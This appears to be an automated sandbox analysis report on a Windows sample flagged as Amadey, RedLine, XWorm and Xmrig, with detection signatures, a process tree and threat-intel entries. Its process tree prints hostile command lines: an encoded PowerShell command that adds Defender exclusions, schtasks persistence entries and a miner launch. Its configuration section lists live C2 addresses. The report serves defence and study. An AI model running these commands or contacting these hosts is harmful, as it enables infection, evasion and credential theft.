Edit tour

Windows Analysis Report
trSK2fqPeB.exe

Overview

General Information

Sample name:	trSK2fqPeB.exe renamed because original name is a hash value
Original sample name:	4d40ebb93aa34bf94d303c07c6a7e5e5.exe
Analysis ID:	1502281
MD5:	4d40ebb93aa34bf94d303c07c6a7e5e5
SHA1:	9333bc5b3f78f0a3cca32e1f6a90af8064bf8a81
SHA256:	ef46ced1cea1c98722dc71aa0cf640bdc38d8677d92026b6fde6ce6ee2d623b5
Tags:	exeRedLineStealer
Infos:

Detection

Amadey, RedLine, XWorm, Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Xmrig

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected AntiVM3

Yara detected RedLine Stealer

Yara detected XWorm

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Allocates memory in foreign processes

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to inject code into remote processes

Creates HTML files with .exe extension (expired dropper behavior)

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Detected Stratum mining protocol

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Encrypted powershell cmdline option found

Found strings related to Crypto-Mining

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Reads the System eventlog

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Child Process of AspNetCompiler

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Yara detected PersistenceViaHiddenTask

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect virtual machines (SLDT)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the user directory

Enables debug privileges

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: AspNetCompiler Execution

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

trSK2fqPeB.exe (PID: 7680 cmdline: "C:\Users\user\Desktop\trSK2fqPeB.exe" MD5: 4D40EBB93AA34BF94D303C07C6A7E5E5)

RegAsm.exe (PID: 7808 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

52i.exe (PID: 7972 cmdline: "C:\Users\user\AppData\Local\Temp\1000267001\52i.exe" MD5: 4D190C235680B3E4481E4D7685E9A118)

kitty.exe (PID: 8052 cmdline: "C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe" MD5: 0EC1F7CC17B6402CD2DF150E0E5E92CA)

schtasks.exe (PID: 8076 cmdline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Cerker.exe (PID: 8164 cmdline: "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" MD5: 0EC1F7CC17B6402CD2DF150E0E5E92CA)

ovrflw.exe (PID: 3688 cmdline: "C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe" MD5: 3ADFC7CF1E296C6FB703991C5233721D)

mswabnet.exe (PID: 7692 cmdline: "C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe" MD5: 3ADFC7CF1E296C6FB703991C5233721D)

svchost.exe (PID: 7728 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

Cerker.exe (PID: 8176 cmdline: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe MD5: 0EC1F7CC17B6402CD2DF150E0E5E92CA)

schtasks.exe (PID: 6788 cmdline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

FRaqbC8wSA1XvpFVjCRGryWt.exe (PID: 3736 cmdline: "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" MD5: DB5717FD494495EEA3C8F7D4AB29D6B0)

schtasks.exe (PID: 1068 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Windows" /tr "C:\Users\user\Windows.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

IIZS2TRqf69aZbLAX3cf3edn.exe (PID: 8160 cmdline: "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe" MD5: 8083FED730E151BF47528621DB8E7FF8)

cmd.exe (PID: 6728 cmdline: "C:\Windows\System32\cmd.exe" /k START "" "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe" & EXIT MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

IIZS2TRqf69aZbLAX3cf3edn.exe (PID: 7032 cmdline: "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe" MD5: 8083FED730E151BF47528621DB8E7FF8)

ix4A2DreBBsQwY6YHkidcDjo.exe (PID: 7604 cmdline: "C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe" MD5: DB5717FD494495EEA3C8F7D4AB29D6B0)

YAPNXRPmcarcR4ZDgC81Tbdk.exe (PID: 7156 cmdline: "C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe" MD5: 8083FED730E151BF47528621DB8E7FF8)

powershell.exe (PID: 7452 cmdline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUA MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 5064 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

TypeId.exe (PID: 7468 cmdline: C:\Users\user\AppData\Roaming\Guid\TypeId.exe MD5: 4D190C235680B3E4481E4D7685E9A118)

aspnet_compiler.exe (PID: 4628 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe MD5: DF5419B32657D2896514B6A1D041FE08)

xzzrvckwuia.exe (PID: 2688 cmdline: "C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe" MD5: 85441D14F17C49EA015D5CC9C53FE164)

conhost.exe (PID: 3592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AddInProcess.exe (PID: 416 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RR7XQNc8dKLtgQouBpDVpnVyh2AvUBCjXJ.RIG -p x --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)

Illumination.pif (PID: 5224 cmdline: "C:\Users\user\Pictures\Illumination.pif" MD5: 4D40EBB93AA34BF94D303C07C6A7E5E5)

RegAsm.exe (PID: 2652 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

Cerker.exe (PID: 5900 cmdline: "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" MD5: 0EC1F7CC17B6402CD2DF150E0E5E92CA)

schtasks.exe (PID: 8136 cmdline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

HM3SOlbpH71yEXUIEAOeIiGX.exe (PID: 7408 cmdline: "C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe" MD5: DB5717FD494495EEA3C8F7D4AB29D6B0)

SmLAztxc1o8yfogkJXrRjbDt.exe (PID: 7320 cmdline: "C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe" MD5: 8083FED730E151BF47528621DB8E7FF8)

Windows.exe (PID: 3156 cmdline: C:\Users\user\Windows.exe MD5: DB5717FD494495EEA3C8F7D4AB29D6B0)

mswabnet.exe (PID: 3452 cmdline: "C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe" MD5: 3ADFC7CF1E296C6FB703991C5233721D)

Windows.exe (PID: 5904 cmdline: "C:\Users\user\Windows.exe" MD5: DB5717FD494495EEA3C8F7D4AB29D6B0)

Illumination.pif (PID: 7348 cmdline: "C:\Users\user\Pictures\Illumination.pif" MD5: 4D40EBB93AA34BF94D303C07C6A7E5E5)

RegAsm.exe (PID: 5472 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

Cerker.exe (PID: 7020 cmdline: "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" MD5: 0EC1F7CC17B6402CD2DF150E0E5E92CA)

schtasks.exe (PID: 6984 cmdline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mswabnet.exe (PID: 5320 cmdline: "C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe" MD5: 3ADFC7CF1E296C6FB703991C5233721D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: Xworm

{"C2 url": ["exonic-hacks.com"], "Port": "1920", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Threatname: Amadey

{"C2 url": "185.215.113.19/CoreOPT/index.php", "Version": "4.41", "Install Folder": "417fd29867", "Install File": "ednfoki.exe"}

Threatname: RedLine

{"C2 url": ["185.208.158.139:27667"], "Bot Id": "button1"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
dump.pcap	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10a887a:$s6: VirtualBox 0x24acf7f:$s6: VirtualBox 0x24c650a:$s6: VirtualBox 0x10a87d8:$s8: Win32_ComputerSystem 0x24acedd:$s8: Win32_ComputerSystem 0x24c6468:$s8: Win32_ComputerSystem 0x10aca4b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x24b0ae2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10acae8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x24b0b7f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x24ca06c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x10acbfd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x24ca181:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10aadc9:$cnc4: POST / HTTP/1.1 0x24af280:$cnc4: POST / HTTP/1.1 0x24c87bf:$cnc4: POST / HTTP/1.1

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Windows.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\Windows.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\Windows.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x115e8:$s6: VirtualBox 0x11546:$s8: Win32_ComputerSystem 0x14cd3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14d70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14e85:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13667:$cnc4: POST / HTTP/1.1
C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x115e8:$s6: VirtualBox 0x11546:$s8: Win32_ComputerSystem 0x14cd3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14d70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14e85:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13667:$cnc4: POST / HTTP/1.1
C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x115e8:$s6: VirtualBox 0x11546:$s8: Win32_ComputerSystem 0x14cd3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14d70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14e85:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13667:$cnc4: POST / HTTP/1.1
C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x115e8:$s6: VirtualBox 0x11546:$s8: Win32_ComputerSystem 0x14cd3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14d70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14e85:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13667:$cnc4: POST / HTTP/1.1
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000017.00000002.2247277729.000001CD28F45000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000002E.00000002.4156132656.00000272D94EC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000000.00000002.1659763375.000000001CE50000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001A.00000002.4131368164.0000020D46AE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000017.00000002.2247277729.000001CD28CC4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000002E.00000002.4108997136.0000000140465000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000002E.00000002.4108997136.0000000140465000.00000040.00000400.00020000.00000000.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x468d8:$a1: mining.set_target 0x413b0:$a2: XMRIG_HOSTNAME 0x43480:$a3: Usage: xmrig [OPTIONS] 0x41388:$a4: XMRIG_VERSION
0000000C.00000002.1976643095.000001D99A351000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.1805008168.00000202F8055000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000026.00000002.2144035452.00000209CF22E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.1805008168.00000202F80F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000F.00000002.1797088014.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000017.00000002.2247277729.000001CD28CEC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000025.00000002.2158620640.000002B2905D5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000025.00000002.2092329177.000002B28006E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000025.00000002.2158620640.000002B290305000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000017.00000002.2040138545.000001CD18870000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000026.00000002.2205943039.00000209DF53C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000028.00000002.2078804630.0000018167F11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000028.00000002.2065045219.000001815801C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1645950276.0000000012B01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000011.00000002.2156164658.0000000003011000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000011.00000002.2211716586.0000000013011000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000011.00000002.2211716586.0000000013011000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x22060:$s6: VirtualBox 0x21fbe:$s8: Win32_ComputerSystem 0x2574b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x257e8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x258fd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x240df:$cnc4: POST / HTTP/1.1
00000026.00000002.2205943039.00000209DF514000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.1805008168.00000202F7E25000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000028.00000002.2078804630.0000018168445000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000002E.00000002.4108997136.0000000140000000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000003.00000002.1762236134.00000202E7B21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000017.00000002.2247277729.000001CD28EA5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
